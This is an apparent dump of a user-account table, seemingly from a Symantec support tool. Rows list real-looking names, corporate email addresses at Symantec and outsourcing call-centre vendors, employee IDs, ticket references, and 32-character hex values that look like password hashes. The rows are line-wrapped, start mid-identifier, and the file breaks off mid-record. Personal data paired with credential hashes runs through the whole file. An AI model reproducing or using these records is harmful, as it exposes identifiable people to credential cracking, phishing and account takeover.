d33c-41ac-bafa-b50dd4b1c45b,CRQ000000314460-VMD-4/08/2011,000-000,nh.symantec@te
leperformance.com.ar,Teleperformance,d954603e67d7f94879f810b01285c375,Adalberto
Lopez,<blank>,112692,Diego,NULL,NULL,NULL
6251-4ffc-b6ad-e9444cfe8bf6,INC213497,nam 07/13/2010,tools_id@symantec.suth.com,
Sutherland,149426ff9b9da3f17279489b6b2da6ee,Gnanaprakasam,<blank>,102033,Robin,N
ULL,NULL,NULL
56f2-48af-a96e-06df7fb85100,SSS 14.07.10,INC216300,Priya_Gautam@symantec.com,<bl
ank>,b64c5479e5dc974cb144592cde732129,Gautam,<blank>,083301,Priya,NULL,NULL,NULL
b0cf-49f3-bd8e-ed40d05eb027,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,086ead7a5487991db7fb33b753cca5f6,RaoB,<blank>,098144,VijayaBhaskar,NU
LL,NULL,NULL
0a2c-45af-9040-0057aace56d1,sms 01.10,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,752ddacf862e28d77d9578493d5e6636,Villar,<blank>,093245,Loralie Ann,NU
LL,NULL,NULL
385e-4a64-8ee6-14107f5cb039,WS 15-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,f1226aa7b56ce0d1ce339df1ed753870,ShareefShaik,<blank>,089078,Mohammad,NUL
L,NULL,NULL
fe20-4e6f-a587-48b317fc646a,<blank>,SH 29/09/2010,tools_id@symantec.suth.com,<bl
ank>,f5ac889312f4f1483734776fab77827a,Lakshmanan,<blank>,092564,Jithesh,NULL,NUL
L,NULL
80f-407a-95fe-61f87484615e,<blank>,<blank>,vignesh_shanmugam@symantec.com,Symant
ec,c58546efa0a82ac65022c04d620a264a,Shanmugam,<blank>,vignesh_shanmugam,Vignesh,
NULL,NULL,NULL
996-456a-9391-293433a64cc9,<blank>,996/060-3341,akoijam_chan@symantec.com,<blank
>,e4fbb87020ea8a4f60044e5acb65fc0f,Chanu,<blank>,Akoijamtomtom_Chanu,Akoijamtomt
om,NULL,NULL,NULL
3ae-44d7-a5e6-679f78bd6c88,<blank>,051922,rgdsilva@sercom.com.br,Sercom,15bf1184
173c4fb5ca270464c6af394a,Silva,<blank>,rafael_silva,Rafael,NULL,NULL,NULL
dfb6-4612-a665-f573ff74c7cc,<blank>,<blank>,betty_duperray@symantec.com,Symantec
,3c98eac3a354c048f9890e3c51d8d9c1,Duperray,<blank>,betty_duperray,Betty,NULL,NUL
L,NULL
284-47a5-975c-fe75aee40caf,<blank>,071479,nherve@symantec.teleperformance.gr,TPG
Archived,b38b26525e2373e30652b60baf194849,Ntimbane,<blank>,benoitherv\xe9_ntimb
ane,Benoit-Herv\xe9,NULL,NULL,NULL
827f-4f20-8c2b-8a0cda152291,<blank>,EMPROV,accounts@symantec.teleperformance.gr,
Teleperformance,d83e8fe3af0613b54375a667c17baa7a,Petaloudis,<blank>,095513,David
,NULL,NULL,NULL
8cd-434f-99a7-1f89fcc4b0ac,<blank>,067008,daggelopoulou@symantec.teleperformance
.gr,TPG,e0b769715390fc2487821fac9ffef6ed,Angelopoulou,<blank>,dimitra_angelopoul
ou,Dimitra,NULL,NULL,NULL
3de-422d-8cda-bd101043bb55,<blank>,052904,dgotz@symantec.teleperformance.gr,TPG,
6ca519649922809a3adcbc3ddb5ce371,G\xf6tz,<blank>,dimitrios_g\xf6tz,Dimitrios,NUL
L,NULL,NULL
ea6-4cb6-9bd5-7de98a346fce,<blank>,069672,ekatsoris@symantec.teleperformance.gr,
TPG Archived,0ef859632899bd47df7d87f3a726742e,Katsoris,<blank>,edmonddimitris_ka
tsoris,Edmond-Dimitris,NULL,NULL,NULL
3d9-4a2d-bda1-a2800ccae20b,<blank>,<blank>,elpapadopoulou@symantec.teleperforman
ce.gr,TPG,975243de992077e0114810aa2f48f8b9,Papadopoulou,<blank>,eleni_papadopoul
o,Eleni,NULL,NULL,NULL
766-4832-9d3f-ecf7264675d9,<blank>,071069,emakri@symantec.teleperformance.gr,Tel
elperformance Hellas,b6b30ec336f1f58538dd76fb95396b05,Makri,<blank>,eleni _makri
,Eleni,NULL,NULL,NULL
c564-4049-97fe-5d6feb621b24,CRQ000000250244-VMD-03/05/11,000-000,tools_id@symant
ec.suth.com,Sutherland,ca2c24b7cbbc326a6ce163780ef5f840,Balsara,<blank>,115571,B
havin,NULL,NULL,NULL
7774-4c06-9adb-ac9c1bbb6070,CRQ000000250251-VMD-03/05/11,000-000,tools_id@symant
ec.suth.com,Sutherland,a09f03938a74b783985520d78ff61ff3,Pawar,<blank>,115573,Abh
ay,NULL,NULL,NULL
3ec-41a8-ad5f-e5062f94153d,<blank>,069682,jdacucha@symantec.teleperformance.gr,T
eleperformance Greece,3f48d993526c0917283bf1dd197aa190,Da Cunha,<blank>,jos\xe9m
iguel_dacunha,Jos\xe9-Miguel,NULL,NULL,NULL
2f2-4f55-a447-1b9c8410774f,<blank>,069683,krybicka@symantec.teleperformance.gr,T
PG,0c8ccc10dca7139f096103d0d26e8f85,Rybicka,<blank>,karina_rybicka,Karina,NULL,N
ULL,NULL
fd87-4c12-96dc-7919395e5f6f,CRQ000000208170-vmd-25-02-11,000-000,tools_id@symant
ec.suth.com,Sutherland,aacc71fd3c26b099ec268a38d3bf02a8,Konatala,<blank>,113370,
Nagendra,NULL,NULL,NULL
2e12-4240-a917-b4b0f4118933,SRB 19.07.2010,INC213497,tools_id@symantec.suth.com,
Sutherland,5298ef99932f72948dd912cdc1981842,Jane,<blank>,075099,Laure Carpus,NUL
L,NULL,NULL
eb7-42c2-a00d-db2218f6661c,<blank>,072414,lmadani@symantec.teleperformance.gr,Te
lelperformance Hellas,ee16974ac1ee89ddf01d9ee592a846b2,Madani,<blank>,lucile_mad
ani,Lucile,NULL,NULL,NULL
e9a0-4c87-979e-0c9d18959f08,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,d4c35854b7c315fcbd0d874aa395b759,N A,<blank>,adil_na_cc,Adil ,NULL,NULL,N
ULL
fc36-41a8-9c0d-33bc0f7391ae,<blank>,<blank>,nh.symantec@teleperformance.com.ar,<
blank>,732ff7df26226a0d7b2b7a703541173a,SOUSA NASCIMIENTO DOS SANTOS,<blank>,108
621,LUCIANO,NULL,NULL,NULL
b11-4da3-9633-f63b919297b3,<blank>,067003,agazi@symantec.teleperformance.gr,TPG,
4c08c13531560960211379d1705af995,Gazi,<blank>,katerina_gazi,Katerina,NULL,NULL,N
ULL
3c7-4b4a-9f02-b28e2c220114,<blank>,<blank>,adelakou@symantec.teleperformance.gr,
TPG,7e2344ba32b609450f2878f8320c6048,Delakou,<blank>,mina_delakou,Mina,NULL,NULL
,NULL
30a-4b1d-863d-070afa723592,<blank>,053107,mkopinska@symantec.teleperformance.gr,
TPG,98bf9feebeb3c37cf5007804c5b30805,Kopinska,<blank>,monika_kopinska,Monika,NUL
L,NULL,NULL
bd74-41cd-aefd-fa98c80fb938,28/05/2010 - SPJ,INC183144,Tools_ID@symantec.Suth.Co
m,Sutherland,ad40f4a2abdefc88eaa70931d4cd1083,Saleem,<blank>,101060,Mohamed,NULL
,NULL,NULL
bc98-40f7-957e-3065e72e2c71,SRB 15.06.2010,INC000000194853,tools_id@symantec.sut
h.com,Sutherland,d214b78c90a56892fe7fdc4fcbebef9f,Rajan,<blank>,104609,Saumya,NU
LL,NULL,NULL
bcb0-4441-8f46-f44421840853,CRQ000000542024--vmd--06/02/2012,000-000,tools_id@sy
mantec.suth.com,Sutherland,01f157517dca020ddef31b0390c53618,Shaikh,<blank>,12467
9,Almas,NULL,NULL,NULL
8fd9-4d08-9ada-354b044290b9,<blank>,<blank>,nh.symantec@teleperformance.com.ar,<
blank>,f60a08c65324701552ff172a58fcf570,Cucci,<blank>,108626,Veronica,NULL,NULL,
NULL
6eec-48a3-8b86-e2879329af53,SSS 17/12/09,EMPROV,tools_id@symantec.suth.com,Suthe
rland,67f01c2314053a709b69f66773e62d60,NS,<blank>,sreejith_ns_cc,Sreejith,NULL,N
ULL,NULL
4c5-4d90-b5ac-8667dcdc41e5,<blank>,87250,nh.symantec@teleperformance.com.ar,TPA,
a851a6dfe12d7a00ddee6b9ae38e3e4f,Alberto Anta,<blank>,luisalberto_anta,Luis,NULL
,NULL,NULL
3faa-447a-8101-4229c9328d64,16/06/2010 - SPJ,EMPROV,symaccount@neusoft.com,Neuso
ft,05323d2b3c182ef179e12db28baa1ff1,Shen,<blank>,105864,Yingyu,NULL,NULL,NULL
721-48d2-8016-3d474f76e362,<blank>,EMPROV,symaccount@ipcdoctor.co.kr,PCDoctor,d3
db936ae2463bfc1a25baee2a0ea76c,Lee,<blank>,081232,Chunwoo,NULL,NULL,NULL
cff-41b7-9eb2-5cfef68473d7,<blank>,073652,Ming_Chai@symantec.com,e4e,d8af6ff26b5
ed2c69b67bf105a9509c3,Janardhanan,<blank>,Kiran_Janardhanan,Kiran ,NULL,NULL,NUL
L
7d64-4024-b507-a8448c89d35c,sms 29,EMPROV,Tools_Id@symantec.Suth.com,Sutherland,
2a90740447846c6f7c8b64fe5cb74a72,Jerome Onate Tesiorna,<blank>,080579,Ben,NULL,N
ULL,NULL
4415-419e-acdd-96386da4b472,16/06/2010 - SPJ,EMPROV,symaccount@neusoft.com,Neuso
ft,e02dfef87eafdee2130ad3da08070d0d,Zou,<blank>,105869,Yu,NULL,NULL,NULL
004-4f49-8503-6469447a392b,<blank>,069667,aumutoni@symantec.teleperformance.gr,T
PG,29038c977a45e82481cf32733d32a413,Umutoni,<blank>,ange_umutoni,Ange,NULL,NULL,
NULL
185-4188-8f2e-43a7573b02a3,<blank>,069678,ekloura@symantec.teleperformance.gr,TP
G,adb089122406fcc935f5cf32b28886ed,Kloura,<blank>,evangelia_kloura,Evangelia,NUL
L,NULL,NULL
2d4-4348-a293-33f3becbabea,<blank>,89252,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",5655549c100584a0254c37d5f7f38855,N,<blank>,ganesh_n,Ganes
h,NULL,NULL,NULL
587-483f-9c73-06e399764add,<blank>,071078,pbola@symantec.teleperformance.gr,TPG,
e4b77f500e4f974c714e4301d48757c7,Bola,<blank>,patricknsobe_ bola,Patrick Nsobe,N
ULL,NULL,NULL
d7b9-4c5c-9e27-b5c7682977b0,bpr-08-06-10,EMPROV,cindy_liu@symantec.com,Symantec,
4f1e1efcd0bfa5f583c0bed6eb713f78,Vadasz,<blank>,092144,Vince,NULL,NULL,NULL
eecb-4565-93f3-606ca55e971f,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267762 - PR - 5/31/2011,db14ff424073f86d85f4cd1b6095a647,Gonzales,<blank>,116685
,DonnaLouise Inocencio,NULL,NULL,NULL
9a14-4673-8e61-31b8078ada1b,<blank>,<blank>,Prasad_Byrashetty@symantec.com,Syman
tec,c29e4ac433171e2f086b185fd11e924d,Team,<blank>,GL2_Team,Global Level2,NULL,NU
LL,NULL
ec0-4d43-a1df-f728139b2ddb,<blank>,071079,vventurin@symantec.teleperformance.gr,
TPG,5afbbb5fbf3e005d592528384855146c,Venturin,<blank>,valentina_venturin,Valenti
na,NULL,NULL,NULL
7d5-476e-8c53-8779e9f3a141,<blank>,073605,Ming_Chai@symantec.com,e4e,23c507283f1
83a7a1939871dc6ebdb30,Tripathy,<blank>,Subrat_Tripathy,Subrat ,NULL,NULL,NULL
def-4b94-a81f-a4bfa220374c,<blank>,89259,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",09390f02420d6ac3273f0688222d79b5,Goudn,<blank>,naresh_gou
dn,Naresh,NULL,NULL,NULL
c11-4dda-807d-1e5f0f6c106a,<blank>,<blank>,yogesh_mohan@symantec.com,Symantec,83
042005cfc8ae6b75fc1e1a50cc0354,Mohan,<blank>,yogesh_mohan,Yogesh,NULL,NULL,NULL
1177-46cd-8474-6e748873b05b,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,b739feb98e6b4a0bfdb6ef5a8b612025,KumarP,<blank>,raja_kumarp_cc,Raja ,NUL
L,NULL,NULL
5e06-49aa-8799-2eb62646a76f,PM - 6/23/2011 - CRQ000000285867,<blank>,tools_id@sy
mantec.suth.com,<blank>,7fca2c0594fe4cdacb6f74a23e61db6c,S,<blank>,117656,Sriniv
asan,NULL,NULL,NULL
9c9-46bd-b6a6-0514652593ff,<blank>,073709,Ming_Chai@symantec.com,e4e,63ef753d417
9e70b66ba92ae63eda308,K G,<blank>,Rajeshkumar_KG,Rajesh kumar,NULL,NULL,NULL
e3c4-45e9-9f86-a1eb3dede7b3,BPR-13-01-10,EMPROV/INC87845,accounts@symantec.telep
erformance.gr,Teleperformance,76879b60f7e3c2bc4e297b28ecd22523,Montani,<blank>,0
71065,Stefano,NULL,NULL,NULL
0ba-4150-8b59-99d510bb9a5d,<blank>,073539,Ming_Chai@symantec.com,e4e,96d68e4668b
1bb6f5357229e2ffe56ed,P,<blank>,Mohamed_P,Mohamed,NULL,NULL,NULL
c2d-4648-bcd5-e788af73258f,<blank>,073534,Ming_Chai@symantec.com,e4e,5f54d0afc28
90bc158d969f727181804,S,<blank>,Sathish_S,Sathish ,NULL,NULL,NULL
a78-4b10-ab68-735abbbcbfe4,<blank>,069688,dgalaris@symantec.teleperformance.gr,T
PG,4000863ed3c59e320b8057889c127fdb,Galaris,<blank>,moshe_galaris,Moshe,NULL,NUL
L,NULL
0de-4cdc-a7bb-93c76ab94d17,<blank>,051699,andreas.jakobsson@teleperformance.se,T
eleperformance Nordic,aadb29f5dded89a4342f0990ef831802,Jakobsson,<blank>,andreas
_jakobsson,Andreas,NULL,NULL,NULL
783f-420c-a8e5-a8f7dd041f62,CRQ000000254780 PBP 10/05/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,2eb74010fba1aa773827258a4bd554a4,DagatanMaglines,<blank
>,101751,LovelyQueene,NULL,NULL,NULL
a1d-4ef5-bd5d-5fd657b4c591,<blank>,073724,Ming_Chai@symantec.com,e4e,2230cdace2f
fd22965b028bb0a060b74,Krishnan,<blank>,Krishnan_Krishnan,Krishnan,NULL,NULL,NULL
8bb0-435e-8481-cc41f516b612,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267789 - PR - 5/31/2011,a77d8ec87dc1094999abb0814b2b99ca,Pelobello,<blank>,11669
2,Argil Alejo,NULL,NULL,NULL
1bdd-4293-a388-d0ff0dd2d33a,INC213497,nam 07/13/2010,tools_id@symantec.suth.com,
Sutherland,b9e25c072de8950336205eeefb394427,Vasudevan,<blank>,102032,Arun,NULL,N
ULL,NULL
9f6-4910-8dbd-f81e90467e16,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland,
45a3ecd88d186a3ef407921f95ca4bdb,Majgaonkar,<blank>,086428,ShoebIqbal,NULL,NULL,
NULL
681c-4d28-8248-971852245fae,<blank>,11050,tools_id@symantec.south.com,Sutherland
,b2e6ad03c8567b9f93efd13adb0db71d,Rao D,<blank>,093624,Vinay V,NULL,NULL,NULL
426-49e9-a2ca-fedfa846f315,<blank>,EMPROV,symaccount@ipcdoctor.co.kr,PCDoctor,e6
af3a317ef2c3b7397ff56f9b4c1400,Park,<blank>,076507,Yoonsung,NULL,NULL,NULL
2937-47e2-b1cd-d7cf6c60ea9d,<blank>,<blank>,nh.symantec@teleperformance.com.ar,<
blank>,0f62eef0463d3ef2dbd50df59e95bb47,MARINO,<blank>,108622,ALEJANDRO DANIEL,N
ULL,NULL,NULL
2c1-4936-94f7-9960e2969876,sms 29,090609/2633284,Tools_id@symantec.suth.com,Syma
ntec,8f3bf7a4e446d7329d6053c7e06a7fb4,Kanchwala,<blank>,aliasgar_kanchwala,Alias
gar,NULL,NULL,NULL
e30b-4ff1-bb9c-97cfa56dc311,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,8edf5557edd3c96402f819eca0d890cc,Ganesh,<blank>,laxmi_ganesh_cc,Laxmi ,NU
LL,NULL,NULL
1e2-4586-b4d3-1d3d526230d0,<blank>,073790,Ming_Chai@symantec.com,e4e,6428596fb9c
5b984ceebf977e789bfbe,Chinnan,<blank>,Sunil_Chinnan,Sunil ,NULL,NULL,NULL
1e07-4e6e-aa18-32d6387ac32d,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,14541d233a6bf80f338815af22b82e5f,R,<blank>,chithra_r_cc,Chithra,NULL,NULL
,NULL
789-4e7e-ba98-a735b492d27b,<blank>,033931,Tools_id@symantec.suth.com,Symantec,14
c7a340dbc77a8dc12c812ac9d2ea0a,Fergenson,<blank>,leah_fergenson,Leah,NULL,NULL,N
ULL
2aea-418e-a445-94898f739358,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
544783 - 8th Feb 2012 - PR,1d90096cf1d512ee8b7be0978c7a9bbd,R,<blank>,075380,Pre
mnath,NULL,NULL,NULL
e581-411e-9470-76cee6e28d1e,CRQ000000191291 SP-26/1/2011,<blank>,tools_id@symant
ec.suth.com,<blank>,47c65cd82e179367997ae69955d5a14b,Nemani,<blank>,112537,Rosel
ine,NULL,NULL,NULL
e91-465e-9cc3-891065991eb9,<blank>,073452,Ming_Chai@symantec.com,e4e,34502c2f18d
022de32fa30489afcc244,C R,<blank>,Renuka_CR,Renuka ,NULL,NULL,NULL
7cc5-41a4-a6e0-bf9ce6691424,SRB 19.07.2010,INC213497,tools_id@symantec.suth.com,
Sutherland,2dc127c2f84a793c497df948e4532468,Gwen Gonzalez,<blank>,075110,Melodee
,NULL,NULL,NULL
5e18-47e4-a395-4d77ea36d9f5,<blank>,<blank>,amit_kanchagar@SUTH.COM,PM - 2/20/20
12 - CRQ000000560439,fb84aa11e775ac765b062456def855f8,Kanchagar,<blank>,125024,A
mit,NULL,NULL,NULL
f50d-4421-91e6-8cc9da53c88c,<blank>,<blank>,melvin_jackson@symantec.com,Symantec
,af67331ffe69be0053e0fb995e808063,Jackson,<blank>,melvin_jackson,Melvin,NULL,NUL
L,NULL
1e52-4cd4-9d32-ce2909f40c1e,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb27
2012-CRQ000000570838,e6ddd12b1a579bdfd497aeb9035f7263,Philip Samuel,<blank>,1253
43,Peter,NULL,NULL,NULL
92cc-4ab9-a75f-544f3baf1c89,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb27
2012-CRQ000000570845,97b6cad129e1c7a22eb9110c0f832fdb,N,<blank>,125345,Balaji,NU
LL,NULL,NULL
5e7-436a-a547-ee9c14033a92,<blank>,073476,Ming_Chai@symantec.com,e4e,67f42a4b75a
b69b409f0b7fb58f018b5,V,<blank>,Dillip_V,Dillip,NULL,NULL,NULL
a5d-437b-8099-10d4cf2b79b0,<blank>,073487,Ming_Chai@symantec.com,e4e,d6eba5739ef
e6ce7496691585768b7e9,M,<blank>,Mohamed_M,Mohamed ,NULL,NULL,NULL
cc5-4c81-9b80-fab22cb39524,<blank>,073508,Ming_Chai@symantec.com,e4e,6f76fb6dc76
347cb7f0ba0a76f02d0fd,V M,<blank>,Ather_VM,Ather ,NULL,NULL,NULL
c65-4b03-8881-2eb0936587f5,<blank>,073503,Ming_Chai@symantec.com,e4e,cada439f65c
cc96ff487e7717c1db757,N,<blank>,Naresh_N,Naresh,NULL,NULL,NULL
c959-47a0-8eca-7f03e4c9e32b,PM - 6/2/2011 - CRQ000000268179,<blank>,Sathish_Kuma
r1@symantec.com,<blank>,f3f77cc55d3527539ce4ce1731dbae9a,Kumar M,<blank>,115478,
Sathish,NULL,NULL,NULL
967b-422a-a297-78a3ae99a083,PM - 6/2/2011 - CRQ000000269186,<blank>,Joven_Pupa@s
ymantec.com,<blank>,027fc6b20a6e1c9224fa29892e0d73a1,Pupa,<blank>,111754,Joven,N
ULL,NULL,NULL
90f-48e7-a801-cbc96fa651aa,<blank>,073559,Ming_Chai@symantec.com,e4e,5a3a9ad7840
2ddc8d7db907cb8a80d40,Rajesh,<blank>,Tanappa_Rajesh,Tanappa,NULL,NULL,NULL
6fb-4d60-8854-dcc5aa862a9f,<blank>,073591,Ming_Chai@symantec.com,e4e,7d70acd4821
778257228871e8171f240,SMK,<blank>,Prem_SMK,Prem,NULL,NULL,NULL
710a-470b-a0fe-11448135bcb0,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,3f65f9f8f936b31237c5f5b983a0c994,K,<blank>,sivasubramaniam_k_cc,SivaSubra
maniam,NULL,NULL,NULL
936-4011-8ca7-09d8f1bd9d24,<blank>,073358,Ming_Chai@symantec.com,e4e,7b8e7c151a9
7829a502ea639098f0eaa, Vanitha,<blank>,Chinaawamy_Vanitha,Chinaawamy,NULL,NULL,N
ULL
d24c-4f77-8a0e-7fb44a9af209,<blank>,<blank>,toolsid@symantec.com,RM-feb7-2012-CR
Q000000544422,01c78f2c03fead98987631a32056e0be,Pinon,<blank>,101793,Raphael Char
les,NULL,NULL,NULL
3ecf-447f-a8cc-be3c37f22755,<blank>,<blank>,omkar_more@SUTH.COM,PM - 2/20/2012 -
CRQ000000560486,6d761e5afb4923101911517d932b22a6,More,<blank>,125032,Omkar,NULL
,NULL,NULL
2b8f-412a-a244-9c47758ee88a,SRB 19.07.2010,INC213497,tools_id@symantec.suth.com,
Sutherland,52fefaf0256b03e44e39c5f8f1ee560f,Jeffrey,<blank>,075101,James,NULL,NU
LL,NULL
d9b-4fda-9122-892e66013f96,<blank>,90022/2635106,Tools_id@symantec.suth.com,"Sut
herland Global Services, Inc.",2fab750144fbecf3ceab58cbed2b89c0,Vardhan Y,<blank
>,jaya_vardhany,Jaya,NULL,NULL,NULL
4f9c-49ab-998d-b0d59fb56038,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
591326 - PR - 14th March 2012,e3b1dca44c4f9d6b49f86e1533feb3f0,Abelardo,<blank>,
222405,Samantha Leonora,NULL,NULL,NULL
847e-4652-adb3-0ce41cb83fd9,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
591333 - PR - 14th March 2012,e21fd77a404ef264ac0db6d470eb3db1,Arca,<blank>,2224
07,Patrick Daniel,NULL,NULL,NULL
c0f-466e-9b96-fe3b59ffe144,<blank>,<blank>,ross_tobias@symantec.com,Symantec,5fa
eba908e64ea0579bdbf29744a6013,Tobias,<blank>,ross_tobias,Ross,NULL,NULL,NULL
802-49b0-bb40-27b4dd603adc,<blank>,85681,Tools_id@symantec.suth.com,Sutherland G
lobal Services,df4a542fdd1c3a1af4be023954882204,Pirozzi,<blank>,maria_pirozzi,Ma
ria,NULL,NULL,NULL
1b6-4db8-9c2f-1970ca4957b2,<blank>,073733,Ming_Chai@symantec.com,e4e,cc9bafbe971
2b79df04d9b4edca93ed8,Kasa,<blank>,Viswanath_Kasa,Viswanath,NULL,NULL,NULL
4fb0-4c1b-89b8-c359b631a2cf,SRB 19.07.2010,INC213497,tools_id@symantec.suth.com,
Sutherland,99590f5902799196d1d2db41e0c442e8,Liu,<blank>,075147,Sandra,NULL,NULL,
NULL
d423-4505-9c55-bae0a8a78e45,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,064fa512d09884888285002ac4c46241,M,<blank>,074664,Prabu,NULL,NULL,NULL
90d0-4ee2-953d-81e7b299646a,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,283163c469aeff2c37134e7ea2e289a9,ML,<blank>,jayaveena_ml_cc,Jayaveena ,NU
LL,NULL,NULL
a04-4c61-a27d-92fead64ca84,<blank>,89153,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",323454f3a5b48bd9677d5a5a62958923,KattackakathuSasi,<blank
>,bhagyalekha_kattacka,Bhagyalekha,NULL,NULL,NULL
d6fa-42ae-8976-691038185edd,SRB 18.06.2010,INC000000197662,Tools_ID@Symantec.Sut
h.com,Sutherland,fdb83e622a997518ca931be38f570815,OngcoyMabatid,<blank>,104908,R
alph,NULL,NULL,NULL
b2c7-46fd-ade4-861d9cd9e7a9,CRQ000000314465--VMD--04/08/2011,000-000,erapti@tele
performance.com,Teleperformance,68d2b7be6d3db1c193c984e3f68b2691,Rapti,<blank>,1
19144,Eleni,NULL,NULL,NULL
a24-4d0a-8b0d-35c13e2dd53e,SRB 30.07.2010,INC000000230632,symantec_2nd_maa@tp-te
c.nl,TPH,2137080183f6f83a216be77f672320f7,den Camp,<blank>,091883,Armand Op,NULL
,NULL,NULL
a2d5-403f-a2ec-9af6198dafc7,CRQ000000238571 - PM - 4/12/2011,<blank>,Florence_De
_Filippis@symantec.com,<blank>,57174e8a022cc05e5b0ee6e6908d519f,De Filippis,<bla
nk>,101589,Florence,NULL,NULL,NULL
e50a-4071-bb4a-7264fbb35ce8,CRQ000000241079 PBP 15/04/2011,<blank>,Naresh_Babu@s
ymantec.com,Symantec,1b9d8bd7feaba8606274957e3684d995,Babu,<blank>,114410,Naresh
,NULL,NULL,NULL
2011-4785-9d9b-e978a2a45878,CRQ000000241079 PBP 15/04/2011,<blank>,Amita_CK@syma
ntec.com,Symantec,9c7aca7fa1babe2646979d4537eb3a7a,CK,<blank>,114390,Amita,NULL,
NULL,NULL
392-460f-a049-aa7eaf4c97cc,<blank>,073507,Ming_Chai@symantec.com,e4e,17e08bbf1fd
6d40bca6f422187e23101,V,<blank>,Hemant_V,Hemant,NULL,NULL,NULL
fb7-48a5-b899-948a85136b56,<blank>,073635,Ming_Chai@symantec.com,e4e,d6794399db1
206dbe26072c84624f56e,Louis,<blank>,Arun_Louis,Arun,NULL,NULL,NULL
fa6-4586-a9e3-4cf940b6d871,<blank>,89275,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",4e91769b88816a143495acb47ff2171f,Shukur,<blank>,shaik_shu
kur,Shaik,NULL,NULL,NULL
0762-4be6-8cb4-bf034f96b040,<blank>,<blank>,toolsid@symantec.com,RM-feb7-2012-CR
Q000000544422,2fd6f606acc730309e7b60355b5c8b0b,Daus,<blank>,111125,Gabriel Angel
o,NULL,NULL,NULL
9b3-41eb-9b61-aad49ce32b39,<blank>,EMPROV,symaccount@ipcdoctor.co.kr,PCDoctor,d6
aa73a2f7e412e539e42a88a1328faf,Shin,<blank>,086530,Hee,NULL,NULL,NULL
c9a5-4fc0-9df3-cae1ebad1a83,<blank>,<blank>,toolsid@symantec.com,RM-feb7-2012-CR
Q000000544422,ae3a6904b17543a912dc8bf3a2b38623,Mendoza,<blank>,101791,Jerico,NUL
L,NULL,NULL
e8b-4f00-bd2c-16615eb8581e,<blank>,073746,Ming_Chai@symantec.com,e4e,6973385674b
32964a3c43e7a9d5dab1b,Ibriss,<blank>,Mohammed_Ibriss,Mohammed ,NULL,NULL,NULL
076-42c7-8602-d15397629fb5,<blank>,073287,Ming_Chai@symantec.com,e4e,c2215c4647a
a99277c4f3a9ad8bca336,Jayapal,<blank>,Jai_Jayapal,Jai ,NULL,NULL,NULL
5368-48f3-b22e-a5e27e331eb9,RM-10feb 2012-CRQ000000551692,<blank>,tools_id@syman
tec.suth.com,<blank>,bbfbb64e0d46633d064a19353eb42f4a,Babar,<blank>,124765,Alok,
NULL,NULL,NULL
2d74-4006-8752-9cdc3daef166,RM-10feb 2012-CRQ000000551717,<blank>,tools_id@syman
tec.suth.com,Sutherland,379c0080f48cdc36a353a10c1cc864b5,Tiwari,<blank>,124769,P
rashant ,NULL,NULL,NULL
3f33-479a-9bc5-1feaf4c09406,CRQ000000241079 PBP 15/04/2011,<blank>,Naveen_G1@sym
antec.com,Symantec,0ab1ac547a0f38b8c1dcb37f8b014526,G1,<blank>,114516,Naveen,NUL
L,NULL,NULL
b8d5-428f-8607-fdb36ac03826,CRQ000000241079,<blank>,Rajesh_Mohan@symantec.com,KS
C-04/15/2011,b573d03fb3d815cb3f2153877a24c4aa,Mohan,<blank>,114411,Rajesh,NULL,N
ULL,NULL
45f6-4259-ad82-3701c578f80b,RM-10feb 2012-CRQ000000551729,<blank>,tools_id@syman
tec.suth.com,sutherland,da8ece79fbc93ceebe6206c6717e6ada,shukla,<blank>,124771,R
ahul,NULL,NULL,NULL
12a-43e0-9ec6-b4717f00570c,<blank>,073356,Ming_Chai@symantec.com,e4e,e90763bce4a
45f19d105615088c1f5da,Naika,<blank>,Sathish_Naika,Sathish ,NULL,NULL,NULL
03a2-42d1-8ae1-5c425dd57de3,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,a02785040a650e1f4bd3e5988776b5b0,Jose,<blank>,090066,Jojin,NULL,NULL,NULL
88dc-4101-b43a-d94c9cfcb342,CRQ000000241079 PBP 15/04/2011,<blank>,SasiBaskaran_
Gandhi@symantec.com,Symantec,ce488673b4a91eca26f1af4ea783fb04,Gandhi,<blank>,114
498,SasiBaskaran,NULL,NULL,NULL
995e-48b7-8c53-45004b5d69a9,<blank>,<blank>,spalatsidi@symantec.teleperformance.
gr,RM-16frb2012-CRQ000000559138,5434efbeb98923b6bd075d62408b1cb4,Palatsidi,<blan
k>,124839,Soultana,NULL,NULL,NULL
aa0e-45a7-8f56-d5a28ec3116d,<blank>,<blank>,chintan_takwani@SUTH.COM,PM - 2/20/2
012 - CRQ000000560473,a01f7dc9e34745cc4e7fac5cb1fee8e4,Takwani,<blank>,125027,Ch
intan,NULL,NULL,NULL
8064-4345-a4e0-c0f9d3403d6c,CRQ000000241079,<blank>,Arun_P@symantec.com,ksc-04/1
5/2011,c5dedd4a84cc2b25f1a13c09bd131b97,P,<blank>,114684,Arun,NULL,NULL,NULL
4aba-4352-8987-110379c42ba0,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,b
7f6fa34e85670737b227d5646175ddd,Singh,<blank>,111142,Manish,NULL,NULL,NULL
a5de-4917-a824-64c10f4e716e,SRB 28.05.2010,INC182175,tools_id@symantec.suth.com,
